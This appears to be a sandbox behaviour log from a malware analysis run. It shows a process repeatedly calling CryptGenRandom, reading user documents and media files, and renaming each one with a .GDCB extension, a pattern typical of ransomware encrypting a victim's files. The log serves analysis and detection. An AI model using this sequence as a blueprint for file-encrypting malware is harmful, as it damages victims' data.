Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\jNjLs50IkyF.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\jNjLs50IkyF.gif, size = 1048576, size_out = 37494 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\jNjLs50IkyF.gif, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\jNjLs50IkyF.gif.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\kahnQObJzadjF7L.png, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\kahnQObJzadjF7L.png, size = 1048576, size_out = 39296 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\kahnQObJzadjF7L.png, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\kahnQObJzadjF7L.png.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\lvsyP1X4kac5-oJ4Il.mp4, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\lvsyP1X4kac5-oJ4Il.mp4, size = 1048576, size_out = 25718 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\lvsyP1X4kac5-oJ4Il.mp4, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\lvsyP1X4kac5-oJ4Il.mp4.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\RO4EO80gDGY.bmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\RO4EO80gDGY.bmp, size = 1048576, size_out = 101028 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\RO4EO80gDGY.bmp, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\RO4EO80gDGY.bmp.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\tm_ddke9n40UxlNf.m4a, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\tm_ddke9n40UxlNf.m4a, size = 1048576, size_out = 12345 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\tm_ddke9n40UxlNf.m4a, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\tm_ddke9n40UxlNf.m4a.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\uiVP.flv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\uiVP.flv, size = 1048576, size_out = 53220 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\uiVP.flv, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\uiVP.flv.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\vXxmRwzZCj_sg.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\vXxmRwzZCj_sg.avi, size = 1048576, size_out = 29652 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\vXxmRwzZCj_sg.avi, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\vXxmRwzZCj_sg.avi.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\VzXLa-7b6.mp4, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\VzXLa-7b6.mp4, size = 1048576, size_out = 59652 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\VzXLa-7b6.mp4, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\VzXLa-7b6.mp4.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\WQpPr2duNweKE.bmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\WQpPr2duNweKE.bmp, size = 1048576, size_out = 67326 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\WQpPr2duNweKE.bmp, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\WQpPr2duNweKE.bmp.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\xi sEofN8ylvSn f1.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\xi sEofN8ylvSn f1.gif, size = 1048576, size_out = 30639 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\xi sEofN8ylvSn f1.gif, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\xi sEofN8ylvSn f1.gif.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\ZDva7C73jglno2II.mkv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\ZDva7C73jglno2II.mkv, size = 1048576, size_out = 55527 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\ZDva7C73jglno2II.mkv, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\ZDva7C73jglno2II.mkv.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\_K46etKVMAaI10T6boQ.docx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\_K46etKVMAaI10T6boQ.docx, size = 1048576, size_out = 52619 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\_K46etKVMAaI10T6boQ.docx, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\_K46etKVMAaI10T6boQ.docx.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\0fbVcV3Zv5.pptx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\0fbVcV3Zv5.pptx, size = 1048576, size_out = 82389 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\0fbVcV3Zv5.pptx, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\0fbVcV3Zv5.pptx.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\1K3-TZCPmibHkU6FTw.pps, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\1K3-TZCPmibHkU6FTw.pps, size = 1048576, size_out = 68307 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\1K3-TZCPmibHkU6FTw.pps, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\1K3-TZCPmibHkU6FTw.pps.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\3V2cw3uZFEEV-SxWrlF.docx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\3V2cw3uZFEEV-SxWrlF.docx, size = 1048576, size_out = 65149 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\3V2cw3uZFEEV-SxWrlF.docx, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\3V2cw3uZFEEV-SxWrlF.docx.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\4nC7.rtf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\4nC7.rtf, size = 1048576, size_out = 95102 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\4nC7.rtf, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\4nC7.rtf.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\7G4L9lsNnmIcN.xlsx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\7G4L9lsNnmIcN.xlsx, size = 1048576, size_out = 89558 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\7G4L9lsNnmIcN.xlsx, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\7G4L9lsNnmIcN.xlsx.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\CHQmRNcGe_.xlsx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\CHQmRNcGe_.xlsx, size = 1048576, size_out = 11478 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\CHQmRNcGe_.xlsx, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\CHQmRNcGe_.xlsx.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\F52 BWbPLjYuLmJ-w1.pptx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\F52 BWbPLjYuLmJ-w1.pptx, size = 1048576, size_out = 48234 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\F52 BWbPLjYuLmJ-w1.pptx, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\F52 BWbPLjYuLmJ-w1.pptx.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\fDUISGbLgw.pptx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\fDUISGbLgw.pptx, size = 1048576, size_out = 45099 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\fDUISGbLgw.pptx, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\fDUISGbLgw.pptx.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\FfJVg4ausPebvr1q.xlsx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\FfJVg4ausPebvr1q.xlsx, size = 1048576, size_out = 69093 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\FfJVg4ausPebvr1q.xlsx, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\FfJVg4ausPebvr1q.xlsx.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\AprPk7nLlMxB0d4d.xls, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\AprPk7nLlMxB0d4d.xls, size = 1048576, size_out = 69209 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\AprPk7nLlMxB0d4d.xls, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\AprPk7nLlMxB0d4d.xls.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\R8M4R8KAn1bTR.ppt, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\R8M4R8KAn1bTR.ppt, size = 1048576, size_out = 62880 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\R8M4R8KAn1bTR.ppt, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\R8M4R8KAn1bTR.ppt.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\Sc5nXy5 kKlZ2r8gTs.odt, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\Sc5nXy5 kKlZ2r8gTs.odt, size = 1048576, size_out = 58815 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\Sc5nXy5 kKlZ2r8gTs.odt, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\Sc5nXy5 kKlZ2r8gTs.odt.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\tUxL3qY.ppt, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\tUxL3qY.ppt, size = 1048576, size_out = 26200 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\tUxL3qY.ppt, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\tUxL3qY.ppt.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\-XKS.odp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\-XKS.odp, size = 1048576, size_out = 60665 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\-XKS.odp, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\-XKS.odp.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\1C35.odp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\1C35.odp, size = 1048576, size_out = 43896 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\1C35.odp, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\1C35.odp.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\1UScSaKRACH3OPj.odt, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\1UScSaKRACH3OPj.odt, size = 1048576, size_out = 65312 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\1UScSaKRACH3OPj.odt, destination_filename = C:\Users\CIiHmnxMn6Ps\Documents\FtUF9T\ZV1D_nCny\1UScSaKRACH3OPj.odt.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
